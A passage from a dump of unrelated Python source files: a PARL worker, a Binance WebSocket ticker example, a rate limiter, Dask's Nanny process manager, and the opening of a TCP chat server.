if sys.version_info.major == 3:
warnings.simplefilter("ignore", ResourceWarning)
# avoid that many jobs are killed and restarted at the same time.
self.lock.acquire()
# Redirect the output to DEVNULL
FNULL = open(os.devnull, 'w')
for _ in range(job_num):
subprocess.Popen(command, stdout=FNULL, close_fds=True)
FNULL.close()
new_jobs = []
for _ in range(job_num):
job_message = self.reply_job_socket.recv_multipart()
self.reply_job_socket.send_multipart([
remote_constants.NORMAL_TAG,
to_byte(self.remove_job_address)
])
initialized_job = cloudpickle.loads(job_message[1])
new_jobs.append(initialized_job)
def heartbeat_exit_callback_func(job):
job.is_alive = False
logger.warning(
"[Worker] lost connection with the job:{}".format(
job.job_address))
if self.master_is_alive and self.worker_is_alive:
self._remove_job(job.job_address)
# a thread for sending heartbeat signals to job
thread = HeartbeatClientThread(
initialized_job.worker_heartbeat_address,
heartbeat_exit_callback_func=heartbeat_exit_callback_func,
exit_func_args=(initialized_job, ))
thread.setDaemon(True)
thread.start()
self.lock.release()
assert len(new_jobs) > 0, "init jobs failed"
return new_jobs
def _remove_job(self, job_address):
"""Kill a job process and update worker information"""
success = self.worker_status.remove_job(job_address)
if success:
while True:
initialized_job = self.job_buffer.get()
initialized_job.worker_address = self.master_heartbeat_address
if initialized_job.is_alive:
self.worker_status.add_job(initialized_job)
if not initialized_job.is_alive: # make sure that the job is still alive.
self.worker_status.remove_job(
initialized_job.job_address)
continue
else:
logger.warning(
"[Worker] a dead job found. The job buffer will not accept this one."
)
if initialized_job.is_alive:
break
self.lock.acquire()
self.request_master_socket.send_multipart([
remote_constants.NEW_JOB_TAG,
cloudpickle.dumps(initialized_job),
to_byte(job_address)
])
_ = self.request_master_socket.recv_multipart()
self.lock.release()
def _reply_remove_job(self):
"""Worker starts a thread to wait jobs' commands to remove the job immediately"""
self.remove_job_socket.linger = 0
self.remove_job_socket.setsockopt(
zmq.RCVTIMEO, remote_constants.HEARTBEAT_RCVTIMEO_S * 1000)
while self.worker_is_alive and self.master_is_alive:
try:
message = self.remove_job_socket.recv_multipart()
tag = message[0]
assert tag == remote_constants.KILLJOB_TAG
to_remove_job_address = to_str(message[1])
self._remove_job(to_remove_job_address)
self.remove_job_socket.send_multipart(
[remote_constants.NORMAL_TAG])
except zmq.error.Again as e:
#detect whether `self.worker_is_alive` is True periodically
pass
def _get_worker_status(self):
now = datetime.strftime(datetime.now(), '%H:%M:%S')
virtual_memory = psutil.virtual_memory()
total_memory = round(virtual_memory[0] / (1024**3), 2)
used_memory = round(virtual_memory[3] / (1024**3), 2)
vacant_memory = round(total_memory - used_memory, 2)
if _IS_WINDOWS:
load_average = round(psutil.getloadavg()[0], 2)
else:
load_average = round(os.getloadavg()[0], 2)
update_status = {
"vacant_memory": vacant_memory,
"used_memory": used_memory,
"load_time": now,
"load_value": load_average
}
return update_status
def _update_worker_status_to_master(self):
while self.master_is_alive and self.worker_is_alive:
worker_status = self._get_worker_status()
self.lock.acquire()
try:
self.request_master_socket.send_multipart([
remote_constants.WORKER_STATUS_UPDATE_TAG,
to_byte(self.master_heartbeat_address),
cloudpickle.dumps(worker_status)
])
message = self.request_master_socket.recv_multipart()
except zmq.error.Again as e:
self.master_is_alive = False
finally:
self.lock.release()
time.sleep(remote_constants.HEARTBEAT_INTERVAL_S)
def _create_log_server(self, port):
log_server_file = __file__.replace('worker.pyc', 'log_server.py')
log_server_file = log_server_file.replace('worker.py', 'log_server.py')
if port is None:
port = "0" # `0` means using a random port in flask
command = [
sys.executable,
log_server_file,
"--port",
str(port),
"--log_dir",
"~/.parl_data/job/",
"--line_num",
"500",
"--worker_address",
self.reply_log_server_address,
]
if sys.version_info.major == 3:
warnings.simplefilter("ignore", ResourceWarning)
if _IS_WINDOWS:
FNULL = tempfile.TemporaryFile()
else:
FNULL = open(os.devnull, 'w')
log_server_proc = subprocess.Popen(
command, stdout=FNULL, close_fds=True)
FNULL.close()
log_server_address = "{}:{}".format(self.worker_ip, port)
message = self.reply_log_server_socket.recv_multipart()
log_server_heartbeat_addr = to_str(message[1])
self.reply_log_server_socket.send_multipart(
[remote_constants.NORMAL_TAG])
def heartbeat_exit_callback_func():
# only output warning
logger.warning("[Worker] lost connection with the log_server.")
# a thread for sending heartbeat signals to log_server
thread = HeartbeatClientThread(
log_server_heartbeat_addr,
heartbeat_exit_callback_func=heartbeat_exit_callback_func)
thread.setDaemon(True)
thread.start()
return log_server_proc, log_server_address
def exit(self):
"""close the worker"""
self.worker_is_alive = False
kill_process('remote/job.py.*{}'.format(self.reply_job_address))
if self.master_heartbeat_thread.is_alive():
self.master_heartbeat_thread.exit()
def run(self):
"""Keep running until it lost connection with the master.
"""
if self.worker_is_alive:
self.master_heartbeat_thread.join()
|
example_ticker_and_miniticker.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_ticker_and_miniticker.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2020, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import os
import time
import threading
import logging
# import class to process stream data
from example_process_streams import BinanceWebSocketApiProcessStreams
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
# create instance of BinanceWebSocketApiManager and provide the function for stream processing
binance_websocket_api_manager = BinanceWebSocketApiManager(BinanceWebSocketApiProcessStreams.process_stream_data)
# binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
print(oldest_stream_data_from_stream_buffer)
pass
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# create streams
print("\r\n========================================== Starting ticker all ========================================\r\n")
ticker_arr_stream_id = binance_websocket_api_manager.create_stream("arr", "!ticker")
time.sleep(7)
binance_websocket_api_manager.stop_stream(ticker_arr_stream_id)
time.sleep(2)
print("\r\n=========================================== Stopp ticker all ==========================================\r\n")
print("\r\n============================================ Starting ticker ==========================================\r\n")
ticker_stream_id = binance_websocket_api_manager.create_stream("ticker", ['bnbbtc', 'ethbtc'])
time.sleep(7)
binance_websocket_api_manager.stop_stream(ticker_stream_id)
time.sleep(2)
print("\r\n============================================== Stop ticker ===========================================\r\n")
print("\r\n======================================== Starting !miniTicker arr =====================================\r\n")
miniTicker_arr_stream_id = binance_websocket_api_manager.create_stream("arr", "!miniTicker")
time.sleep(7)
binance_websocket_api_manager.stop_stream(miniTicker_arr_stream_id)
time.sleep(2)
print("\r\n========================================== Stop !miniTicker arr =======================================\r\n")
print("\r\n========================================== Starting miniTicker ========================================\r\n")
miniTicker_stream_id = binance_websocket_api_manager.create_stream("miniTicker", ['bnbbtc', 'ethbtc'])
time.sleep(7)
binance_websocket_api_manager.stop_stream(miniTicker_stream_id)
time.sleep(2)
print("\r\n============================================ Stop miniTicker==========================================\r\n")
binance_websocket_api_manager.print_summary()
binance_websocket_api_manager.stop_manager_with_all_streams()
|
limiter.py
|
# coding: utf-8
from __future__ import unicode_literals
import time
from datetime import datetime
from queue import Queue, Full, Empty
from threading import Thread
class BaseRateLimiter(object):
def __init__(self, rate):
self.rate = rate
def acquire(self, count=1):
raise NotImplementedError()
class ThreadingRateLimiter(BaseRateLimiter):
def __init__(self, rate):
super(ThreadingRateLimiter, self).__init__(rate)
self.queue = Queue(rate)
Thread(target=self._clear_queue).start()
def acquire(self, count=1):
try:
self.queue.put(1, block=False)
except Full:
return False
return True
def _clear_queue(self):
while True:
time.sleep(1.0 / self.rate)
try:
self.queue.get(block=False)
except Empty:
pass
class DistributeRateLimiter(BaseRateLimiter):
def __init__(self, rate, cache):
super(DistributeRateLimiter, self).__init__(rate)
self.cache = cache
def acquire(self, count=1, expires=3, key=None, callback=None):
try:
if isinstance(self.cache, Cache):
return self.cache.fetch_token(rate=self.rate, count=count, expires=expires, key=key)
except Exception as ex:
return True
class Cache(object):
def __init__(self):
self.key = 'default'
self.namespace = 'ratelimiter'
def fetch_token(self, *args, **kwargs):
raise NotImplementedError()
class RedisTokenCache(Cache):
def __init__(self, redis_instance):
super(RedisTokenCache, self).__init__()
self.redis = redis_instance
def fetch_token(self, rate, count=1, expires=3, key=None):
date = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
key = ":".join([self.namespace, key if key else self.key, date])
try:
current = self.redis.get(key)
if int(current if current else 0) > rate:
return False
else:
with self.redis.pipeline() as p:
p.multi()
p.incr(key, count)
p.expire(key, int(expires if expires else 3))
p.execute()
return True
except Exception as ex:
return False
|
nanny.py
|
import asyncio
from contextlib import suppress
import errno
import logging
from multiprocessing.queues import Empty
import os
import psutil
import shutil
import threading
import uuid
import warnings
import weakref
import dask
from dask.system import CPU_COUNT
from tornado.ioloop import IOLoop, PeriodicCallback
from tornado import gen
from .comm import get_address_host, unparse_host_port
from .comm.addressing import address_from_user_args
from .core import RPCClosed, CommClosedError, coerce_to_address, Status
from .metrics import time
from .node import ServerNode
from . import preloading
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
get_ip,
mp_context,
silence_logging,
json_load_robust,
parse_timedelta,
parse_ports,
TimeoutError,
)
from .worker import run, parse_memory_limit, Worker
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
"""A process to manage worker processes
The nanny spins up Worker processes, watches then, and kills or restarts
them as necessary. It is necessary if you want to use the
``Client.restart`` method, or to restart the worker automatically if
it gets to the terminate fractiom of its memory limit.
The parameters for the Nanny are mostly the same as those for the Worker.
See Also
--------
Worker
"""
_instances = weakref.WeakSet()
process = None
status = Status.undefined
def __init__(
self,
scheduler_ip=None,
scheduler_port=None,
scheduler_file=None,
worker_port=0,
nthreads=None,
ncores=None,
loop=None,
local_dir=None,
local_directory=None,
services=None,
name=None,
memory_limit="auto",
reconnect=True,
validate=False,
quiet=False,
resources=None,
silence_logs=None,
death_timeout=None,
preload=None,
preload_argv=None,
preload_nanny=None,
preload_nanny_argv=None,
security=None,
contact_address=None,
listen_address=None,
worker_class=None,
env=None,
interface=None,
host=None,
port=None,
protocol=None,
config=None,
**worker_kwargs,
):
self._setup_logging(logger)
self.loop = loop or IOLoop.current()
if isinstance(security, dict):
security = Security(**security)
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args("worker")
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg["address"]
elif scheduler_ip is None and dask.config.get("scheduler-address"):
self.scheduler_addr = dask.config.get("scheduler-address")
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
if protocol is None:
protocol_address = self.scheduler_addr.split("://")
if len(protocol_address) == 2:
protocol = protocol_address[0]
if ncores is not None:
warnings.warn("the ncores= parameter has moved to nthreads=")
nthreads = ncores
self._given_worker_port = worker_port
self.nthreads = nthreads or CPU_COUNT
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = parse_timedelta(death_timeout)
self.preload = preload
if self.preload is None:
self.preload = dask.config.get("distributed.worker.preload")
self.preload_argv = preload_argv
if self.preload_argv is None:
self.preload_argv = dask.config.get("distributed.worker.preload-argv")
if preload_nanny is None:
preload_nanny = dask.config.get("distributed.nanny.preload")
if preload_nanny_argv is None:
preload_nanny_argv = dask.config.get("distributed.nanny.preload-argv")
self.Worker = Worker if worker_class is None else worker_class
self.env = env or {}
self.config = config or {}
worker_kwargs.update(
{
"port": worker_port,
"interface": interface,
"protocol": protocol,
"host": host,
}
)
self.worker_kwargs = worker_kwargs
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get(
"distributed.worker.memory.terminate"
)
if local_dir is not None:
warnings.warn("The local_dir keyword has moved to local_directory")
local_directory = local_dir
if local_directory is None:
local_directory = dask.config.get("temporary-directory") or os.getcwd()
if not os.path.exists(local_directory):
os.makedirs(local_directory)
local_directory = os.path.join(local_directory, "dask-worker-space")
self.local_directory = local_directory
self.preloads = preloading.process_preloads(
self, preload_nanny, preload_nanny_argv, file_dir=self.local_directory
)
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.nthreads)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {
"instantiate": self.instantiate,
"kill": self.kill,
"restart": self.restart,
# cannot call it 'close' on the rpc side for naming conflict
"get_logs": self.get_logs,
"terminate": self.close,
"close_gracefully": self.close_gracefully,
"run": self.run,
}
super(Nanny, self).__init__(
handlers=handlers, io_loop=self.loop, connection_args=self.connection_args
)
self.scheduler = self.rpc(self.scheduler_addr)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100)
self.periodic_callbacks["memory"] = pc
if (
not host
and not interface
and not self.scheduler_addr.startswith("inproc://")
):
host = get_ip(get_address_host(self.scheduler.address))
self._start_port = port
self._start_host = host
self._interface = interface
self._protocol = protocol
self._listen_address = listen_address
Nanny._instances.add(self)
self.status = Status.init
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.nthreads)
async def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
with suppress(allowed_errors):
await asyncio.wait_for(
self.scheduler.unregister(address=self.worker_address), timeout
)
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@property
def local_dir(self):
""" For API compatibility with Nanny """
warnings.warn("The local_dir attribute has moved to local_directory")
return self.local_directory
async def start(self):
""" Start nanny, start local process, start watching """
await super().start()
ports = parse_ports(self._start_port)
for port in ports:
start_address = address_from_user_args(
host=self._start_host,
port=port,
interface=self._interface,
protocol=self._protocol,
security=self.security,
)
try:
await self.listen(
start_address, **self.security.get_listen_args("worker")
)
except OSError as e:
if len(ports) > 1 and e.errno == errno.EADDRINUSE:
continue
else:
raise e
else:
self._start_address = start_address
break
else:
raise ValueError(
f"Could not start Nanny on host {self._start_host}"
f"with port {self._start_port}"
)
self.ip = get_address_host(self.address)
for preload in self.preloads:
await preload.start()
logger.info(" Start Nanny at: %r", self.address)
response = await self.instantiate()
if response == Status.running:
assert self.worker_address
self.status = Status.running
else:
await self.close()
self.start_periodic_callbacks()
return self
async def kill(self, comm=None, timeout=2):
"""Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
return "OK"
deadline = self.loop.time() + timeout
await self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
async def instantiate(self, comm=None) -> Status:
"""Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(
host, self._given_worker_port
)
if self.process is None:
worker_kwargs = dict(
scheduler_ip=self.scheduler_addr,
nthreads=self.nthreads,
local_directory=self.local_directory,
services=self.services,
nanny=self.address,
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address,
)
worker_kwargs.update(self.worker_kwargs)
self.process = WorkerProcess(
worker_kwargs=worker_kwargs,
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit_sync,
worker=self.Worker,
env=self.env,
config=self.config,
)
self.auto_restart = True
if self.death_timeout:
try:
result = await asyncio.wait_for(
self.process.start(), self.death_timeout
)
except TimeoutError:
await self.close(timeout=self.death_timeout)
logger.error(
"Timed out connecting Nanny '%s' to scheduler '%s'",
self,
self.scheduler_addr,
)
raise
else:
result = await self.process.start()
return result
async def restart(self, comm=None, timeout=2, executor_wait=True):
start = time()
async def _():
if self.process is not None:
await self.kill()
await self.instantiate()
try:
await asyncio.wait_for(_(), timeout)
except TimeoutError:
logger.error("Restart timed out, returning before finished")
return "timed out"
else:
return "OK"
@property
def _psutil_process(self):
pid = self.process.process.pid
try:
proc = self._psutil_process_obj
except AttributeError:
self._psutil_process_obj = psutil.Process(pid)
if self._psutil_process_obj.pid != pid:
self._psutil_process_obj = psutil.Process(pid)
return self._psutil_process_obj
def memory_monitor(self):
""" Track worker's memory. Restart if it goes above terminate fraction """
if self.status != Status.running:
return
process = self.process.process
if process is None:
return
try:
proc = self._psutil_process
memory = proc.memory_info().rss
except (ProcessLookupError, psutil.NoSuchProcess, psutil.AccessDenied):
return
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning(
"Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction,
)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.is_alive()
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
def _on_exit_sync(self, exitcode):
self.loop.add_callback(self._on_exit, exitcode)
async def _on_exit(self, exitcode):
if self.status not in (Status.init, Status.closing, Status.closed):
try:
await self.scheduler.unregister(address=self.worker_address)
except (EnvironmentError, CommClosedError):
if not self.reconnect:
await self.close()
return
try:
if self.status not in (
Status.closing,
Status.closed,
Status.closing_gracefully,
):
if self.auto_restart:
logger.warning("Restarting worker")
await self.instantiate()
elif self.status == Status.closing_gracefully:
await self.close()
except Exception:
logger.error(
"Failed to restart worker after its process exited", exc_info=True
)
@property
def pid(self):
return self.process and self.process.pid
def _close(self, *args, **kwargs):
warnings.warn("Worker._close has moved to Worker.close", stacklevel=2)
return self.close(*args, **kwargs)
def close_gracefully(self, comm=None):
"""
A signal that we shouldn't try to restart workers if they go away
This is used as part of the cluster shutdown process.
"""
self.status = Status.closing_gracefully
async def close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status == Status.closing:
await self.finished()
assert self.status == Status.closed
if self.status == Status.closed:
return "OK"
self.status = Status.closing
logger.info("Closing Nanny at %r", self.address)
for preload in self.preloads:
await preload.teardown()
self.stop()
try:
if self.process is not None:
await self.kill(timeout=timeout)
except Exception:
pass
self.process = None
await self.rpc.close()
self.status = Status.closed
if comm:
await comm.write("OK")
await ServerNode.close(self)
class WorkerProcess:
def __init__(
self,
worker_kwargs,
worker_start_args,
silence_logs,
on_exit,
worker,
env,
config,
):
self.status = Status.init
self.silence_logs = silence_logs
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
self.env = env
self.config = config
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
async def start(self) -> Status:
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == Status.running:
return self.status
if self.status == Status.starting:
await self.running.wait()
return self.status
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
name="Dask Worker process (from Nanny)",
kwargs=dict(
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid,
Worker=self.Worker,
env=self.env,
config=self.config,
),
)
self.process.daemon = dask.config.get("distributed.worker.daemon", default=True)
self.process.set_exit_callback(self._on_exit)
self.running = asyncio.Event()
self.stopped = asyncio.Event()
self.status = Status.starting
try:
await self.process.start()
except OSError:
logger.exception("Nanny failed to start process", exc_info=True)
self.process.terminate()
return
msg = await self._wait_until_connected(uid)
if not msg:
return self.status
self.worker_address = msg["address"]
self.worker_dir = msg["dir"]
assert self.worker_address
self.status = Status.running
self.running.set()
init_q.close()
return self.status
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return self.process.pid if self.process and self.process.is_alive() else None
def mark_stopped(self):
if self.status != Status.stopped:
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.info(msg)
self.status = Status.stopped
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
async def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == Status.stopped:
return
if self.status == Status.stopping:
await self.stopped.wait()
return
assert self.status in (Status.starting, Status.running)
self.status = Status.stopping
process = self.process
self.child_stop_q.put(
{
"op": "stop",
"timeout": max(0, deadline - loop.time()) * 0.8,
"executor_wait": executor_wait,
}
)
await asyncio.sleep(0) # otherwise we get broken pipe errors
self.child_stop_q.close()
while process.is_alive() and loop.time() < deadline:
await asyncio.sleep(0.05)
if process.is_alive():
logger.warning(
"Worker process still alive after %d seconds, killing", timeout
)
try:
await process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
async def _wait_until_connected(self, uid):
delay = 0.05
while True:
if self.status != Status.starting:
return
try:
msg = self.init_result_q.get_nowait()
except Empty:
await asyncio.sleep(delay)
continue
if msg["uid"] != uid: # ensure that we didn't cross queues
continue
if "exception" in msg:
logger.error(
"Failed while trying to start worker process: %s", msg["exception"]
)
await self.process.join()
raise msg["exception"]
else:
return msg
@classmethod
def _run(
cls,
worker_kwargs,
worker_start_args,
silence_logs,
init_result_q,
child_stop_q,
uid,
env,
config,
Worker,
): # pragma: no cover
os.environ.update(env)
dask.config.set(config)
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(**worker_kwargs)
async def do_stop(timeout=5, executor_wait=True):
try:
await worker.close(
report=False,
nanny=False,
executor_wait=executor_wait,
timeout=timeout,
)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop("op") == "stop"
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
async def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
await worker
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
else:
try:
assert worker.address
except ValueError:
pass
else:
init_result_q.put(
{
"address": worker.address,
"dir": worker.local_directory,
"uid": uid,
}
)
init_result_q.close()
await worker.finished()
logger.info("Worker closed")
try:
loop.run_sync(run)
except (TimeoutError, gen.TimeoutError):
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
# At this point the loop is not running thus we have to run
# do_stop() explicitly.
loop.run_sync(do_stop)
|
server2.py
|
#!/usr/bin/env python3
"""
Author: Rafael Schreiber
Created: 21-06-2018
This is TCPChat2 Server. This programm is distributed as closed source. This program handles all
ingoing connections and manages them. It also offers a feature-rich server console, where the server
administrator can manages everything if he wants per hand.
"""
from functions import *
import socket
import threading
import json
import os
connDict = { } # This dictionary contains all threaded connections
debug = False # indicator variable for debugging
try:
print("On which IP-Address and or Domain the server should listen? (Default: All)")
serveraddress = str(input(">>> "))
if serveraddress == "":
serveraddress = "0.0.0.0"
print("On which Port the server should be listen? (Default: 2018)")
while True:
serverport = str(input(">>> "))
if serverport == "":
serverport = 2018
break
try:
serverport = int(serverport)
break
except ValueError:
print("The Port must be a number\n")
continue
except KeyboardInterrupt:
print()
exit(0)
except EOFError:
print()
exit(0)
# creating main socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((serveraddress, serverport))
server_socket.listen(5)
class connectedClient(threading.Thread):
def __init__(self, connection, address, iD):
self.connection = connection
self.ip, self.port = address
self.id = iD
self.username = ""
while True:
username = str(self.connection.recv(2048), "utf8")
if not username:
self.closeConnectionByClient()
print(self.ip + ":" + str(self.port) + " with PID " + str(self.id) + " closed his connection without login")
return
username = cliInterpretor(username)
if len(username) == 2:
if username[0] == "%setusername":
if username[1].lower() not in [name.lower() for name in getUsernames(connected=True)] and username[1] != "*" and username[1] != "server":
self.username = username[1]
break
else:
self.send("server", "%usernametaken")
continue
else:
continue
elif len(username) >= 1:
if username[0] == "%exit":
self.closeConnectionByClient()
print(self.ip + ":" + str(self.port) + " with PID " + str(self.id) + " closed his connection without login")
return
else:
continue
else:
continue
self.isonline = True
threading.Thread.__init__(self)
self.daemon = True
self.start()
self.broadcast(self.username, "%isonline", metoo=False)
print(self.username + " is online on " + self.ip + ":" + str(self.port) + " with PID " + str(self.id))
def run(self):
while True:
try:
message = str(self.connection.recv(2048), "utf8")
except ConnectionResetError:
self.closeConnectionByClient()
print(self.username + " on " + self.ip + ":" + str(self.port) + " with PID " + str(
self.id) + " disconnected")
self.broadcast(self.username, "%isoffline", metoo=False)
return
except OSError:
print(self.username + " on " + self.ip + ":" + str(self.port) + " with PID " + str(
self.id) + " disconnected")
self.broadcast(self.username, "%isoffline", metoo=False)
return
if not message: # happens if socket is broken
self.closeConnectionByClient()
print(self.username + " on " + self.ip + ":" + str(self.port) + " with PID " + str(self.id) + " disconnected")
self.broadcast(self.username, "%isoffline", metoo=False)
return
if debug:
try:
print("debug: Incoming from " + self.username + ": " + message) # just for debugging
except UnicodeEncodeError:
print("debug: Incoming from " + self.username + ": Error while decoding ingoing message")
if message[0] != "%":
continue # throw packet with invalid message away
message = cliInterpretor(message)
try:
if message[0] == "%exit":
self.closeConnectionByClient()
print(self.username + " on " + self.ip + ":" + str(self.port) + " with PID " + str(self.id) + " disconnected")
self.broadcast(self.username, "%isoffline", metoo=False)
return
elif message[0] == "%send":
message[2] = clearSpaces(message[2])
if message[2] == "":
continue # throw empty message away
elif message[1] == '*':
self.broadcast(self.username, message[2])
elif message[1] in getUsernames(True):
connDict[usernameToConnection(message[1])].send(self.username, message[2])
else:
continue # throw packet with invalid username away
elif message[0] == "%getusers":
self.sendRaw({"username":"server", "content":"%userlist", "userlist":getUsernames(connected=True)})
except IndexError:
continue # throw packet packet away when server cannot process it
def broadcast(self, username, content, metoo = True):
for connection in connDict:
if connDict[connection].isonline is True:
if not metoo:
if connDict[connection].username != self.username:
connDict[connection].send(username, content)
else:
connDict[connection].send(username, content)
def send(self, username, content):
data = {"username":username, "content":content}
data = json.dumps(data, ensure_ascii=False)
if debug:
try:
print("debug: Outgoing: Sending " + self.username + " " + data)
except UnicodeEncodeError:
print("debug: Outgoing: Error while decoding outgoing message") # just for debugging
self.connection.send(bytes(data, "utf8"))
def sendRaw(self, data):
data = json.dumps(data, ensure_ascii=False)
if debug:
try:
print("debug: Outgoing: Sending " + self.username + " " + data)
except UnicodeEncodeError:
print("debug: Outgoing: Error while decoding outgoing message") # just for debugging
self.connection.send(bytes(data, "utf8"))
def closeConnectionByClient(self):
self.connection.close()
self.isonline = False
def closeConnectionByServer(self, exitmessage = False):
if exitmessage:
self.send("server", exitmessage)
self.send("server", "%exit")
self.connection.close()
self.isonline = False
def getUsernames(connected = False):
usernames = [ ]
for connection in connDict:
if connected:
if connDict[connection].isonline is True:
usernames.append(connDict[connection].username)
else:
usernames.append(connDict[connection].username)
return usernames
def usernameToConnection(username):
for connection in connDict:
if connDict[connection].username == username:
return connection
return False
def connectionToUsername(connection):
try:
return connDict[connection].username
except KeyError:
return False
def acceptConnections():
global connDict
connectionCounter = 0
while True:
connection, address = server_socket.accept()
